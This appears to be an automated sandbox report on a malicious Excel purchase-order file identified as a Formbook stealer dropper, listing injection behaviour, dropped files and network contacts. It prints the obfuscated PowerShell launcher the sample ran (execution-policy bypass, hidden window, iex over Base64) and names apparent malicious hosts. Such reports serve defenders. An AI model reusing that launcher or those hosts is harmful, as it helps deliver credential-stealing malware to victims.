Malware Analysis Report

2025-01-18 12:23

Sample ID 240829-gj64yaydkn
Target PO-014842-2.xls
SHA256 b171b5e7c7abd247edcc25f1c00301e89f1e9715ed6d98f03f4b6a6674c5834b
Tags
formbook b48n defense_evasion discovery execution rat spyware stealer trojan
score
10/10

Analysis Overview

score
10/10

SHA256

b171b5e7c7abd247edcc25f1c00301e89f1e9715ed6d98f03f4b6a6674c5834b

Threat Level: Known bad

The file PO-014842-2.xls was found to be: Known bad.

Malicious Activity Summary

formbook b48n defense_evasion discovery execution rat spyware stealer trojan

Formbook

Process spawned unexpected child process

Formbook payload

Evasion via Device Credential Deployment

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Suspicious use of SetThreadContext

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Enumerates system info in registry

Uses Volume Shadow Copy service COM API

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy WMI provider

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-29 05:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-29 05:51

Reported

2024-08-29 05:53

Platform

win7-20240705-en

Max time kernel

149s

Max time network

138s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

Formbook payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 320 set thread context of 1580 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 1580 set thread context of 1256 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Windows\Explorer.EXE
PID 2188 set thread context of 1256 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\Explorer.EXE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2696 wrote to memory of 3044 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2696 wrote to memory of 3044 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2696 wrote to memory of 3044 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2696 wrote to memory of 3044 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 3044 wrote to memory of 596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3044 wrote to memory of 596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3044 wrote to memory of 596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3044 wrote to memory of 596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 596 wrote to memory of 3024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 596 wrote to memory of 3024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 596 wrote to memory of 3024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 596 wrote to memory of 3024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 3024 wrote to memory of 1072 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 3024 wrote to memory of 1072 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 3024 wrote to memory of 1072 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 3024 wrote to memory of 1072 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 596 wrote to memory of 320 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 596 wrote to memory of 320 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 596 wrote to memory of 320 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 596 wrote to memory of 320 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 320 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 320 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 320 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 320 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 320 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 320 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 320 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 1256 wrote to memory of 2188 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1256 wrote to memory of 2188 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1256 wrote to memory of 2188 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1256 wrote to memory of 2188 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2188 wrote to memory of 2908 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 2188 wrote to memory of 2908 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 2188 wrote to memory of 2908 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 2188 wrote to memory of 2908 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO-014842-2.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/C powErShElL -EX byPasS -nOP -W 1 -c dEviceCrEdeNtIalDePLOyMENT ; iex($(iEX('[systeM.text.encodIng]'+[ChAR]58+[ChAR]0x3A+'uTf8.gETstRiNg([sYSTEM.cONveRt]'+[chAR]0x3a+[ChAR]58+'froMBasE64strINg('+[cHAr]34+'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'+[chaR]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powErShElL -EX byPasS -nOP -W 1 -c dEviceCrEdeNtIalDePLOyMENT ; iex($(iEX('[systeM.text.encodIng]'+[ChAR]58+[ChAR]0x3A+'uTf8.gETstRiNg([sYSTEM.cONveRt]'+[chAR]0x3a+[ChAR]58+'froMBasE64strINg('+[cHAr]34+'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'+[chaR]0X22+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nsfvyqgd.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1315.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1314.tmp"

C:\Users\Admin\AppData\Roaming\MeMpEng.exe

"C:\Users\Admin\AppData\Roaming\MeMpEng.exe"

C:\Users\Admin\AppData\Roaming\MeMpEng.exe

"C:\Users\Admin\AppData\Roaming\MeMpEng.exe"

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\SysWOW64\explorer.exe"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\MeMpEng.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 zhort.de udp
DE 88.99.66.38:443 zhort.de tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 173.222.211.43:80 e6.o.lencr.org tcp
NL 45.89.247.151:80 45.89.247.151 tcp
DE 88.99.66.38:443 zhort.de tcp
NL 45.89.247.151:80 45.89.247.151 tcp
NL 45.89.247.151:80 45.89.247.151 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.71:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.ontosdabiblia.online udp
US 8.8.8.8:53 www.3tcxr.xyz udp
US 8.8.8.8:53 www.ianju-ljef097.vip udp
US 8.8.8.8:53 www.anifestmindset.net udp
US 8.8.8.8:53 www.5ldym2.shop udp

Files

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7E8BDF27898FD04B591B0B0011B10808

C:\Users\Admin\AppData\Local\Temp\CabD69.tmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7E8BDF27898FD04B591B0B0011B10808

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5J67VDZD\IEnetworthUpdated[1].hta

\??\c:\Users\Admin\AppData\Local\Temp\nsfvyqgd.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\nsfvyqgd.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\CSC1314.tmp

C:\Users\Admin\AppData\Local\Temp\RES1315.tmp

C:\Users\Admin\AppData\Local\Temp\nsfvyqgd.dll

C:\Users\Admin\AppData\Local\Temp\nsfvyqgd.pdb

\Users\Admin\AppData\Roaming\MeMpEng.exe

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-29 05:51

Reported

2024-08-29 05:53

Platform

win10v2004-20240802-en

Max time kernel

143s

Max time network

127s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-014842-2.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5024 wrote to memory of 2012 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 5024 wrote to memory of 2012 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-014842-2.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 zhort.de udp
DE 88.99.66.38:443 zhort.de tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 173.222.211.43:80 e6.o.lencr.org tcp
NL 45.89.247.151:80 45.89.247.151 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 38.66.99.88.in-addr.arpa udp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 43.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 151.247.89.45.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp

Files
